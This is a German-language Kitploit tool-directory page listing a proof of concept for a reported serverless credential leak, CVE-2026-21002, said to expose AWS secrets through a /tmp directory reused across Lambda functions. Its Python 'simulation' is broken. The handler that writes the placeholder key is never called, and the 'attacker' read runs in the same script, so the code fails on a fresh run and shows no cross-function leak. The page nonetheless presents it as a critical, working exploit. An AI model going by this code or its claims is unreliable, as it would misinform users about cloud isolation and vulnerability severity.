Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-21002-Serverless-Cold-Start-Credential-Leakage-via-Reused-tmp — PoC-Exploit für das Zugangsdaten-Leck beim Serverless-Kaltstart (CVE-2026-21002), der zeigt, wie wiederverwendete Lambda-/tmp-Verzeichnisse AWS-Secrets für andere Funktionen offenlegen. | Kitploit
Tools/GitHubGitHub/george0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp
Cloud-Infrastruktur-SicherheitSchwachstellenanalyseExploitationServerless-SicherheitDatenexfiltrationCloud-SicherheitLernen & Bildung
GitHubgeorge0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp

CVE-2026-21002-Serverless-Cold-Start-Credential-Leakage-via-Reused-tmp

PoC-Exploit für das Zugangsdaten-Leck beim Serverless-Kaltstart (CVE-2026-21002), der zeigt, wie wiederverwendete Lambda-/tmp-Verzeichnisse AWS-Secrets für andere Funktionen offenlegen.

Repository anzeigen
9vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-21002 – Anmeldedatenleck beim Serverless-Kaltstart über wiederverwendetes /tmp

Programmcode (Python-AWS-Lambda-Simulation)

root@kitploit:~
# lambda_func_sim.py - Simulated serverless function
import os, tempfile, time

SECRET_FILE = '/tmp/credentials'  # reused across warm starts

def handler(event):
    # On first invocation, write a secret
    if not os.path.exists(SECRET_FILE):
        with open(SECRET_FILE, 'w') as f:
            f.write("AWS_SECRET_ACCESS_KEY=sk-123456")
        return "Initialized"
    # Later invocations can read it
    with open(SECRET_FILE) as f:
        return f.read()

# Attack simulation: attacker shares the same /tmp in another function (same VM)
# They can read /tmp/credentials after a cold start.
with open(SECRET_FILE) as f:
    print("Attacker reads:", f.read())

CVE-2026-21002 – Anmeldedatenleck beim Serverless-Kaltstart

Severity: Critical

Überblick

Serverless-Plattformen verwenden die Ausführungsumgebung (einschließlich /tmp) über Funktionsaufrufe hinweg wieder, sogar zwischen verschiedenen Funktionen desselben Kontos. Die Funktion eines Angreifers kann sensible Dateien lesen, die nach einem Kaltstart von einer anderen Funktion in /tmp hinterlassen wurden, was zum Diebstahl von Anmeldedaten führt.

Details zur Schwachstelle

  • Typ: Informationsoffenlegung / funktionsübergreifende Leckage
  • Auswirkungen: Kompromittierung von Anmeldedaten, laterale Bewegung.
  • Grundursache: Das Verzeichnis /tmp wird zwischen warmen Containern ohne Isolation zwischen den Funktionen gemeinsam genutzt.

Demonstration des Exploits

Führen Sie die Simulation aus:

root@kitploit:~
python lambda_func_sim.py

Der Angreifer liest den AWS_SECRET_ACCESS_KEY, der von der Opferfunktion hinterlassen wurde.

Tool herunterladen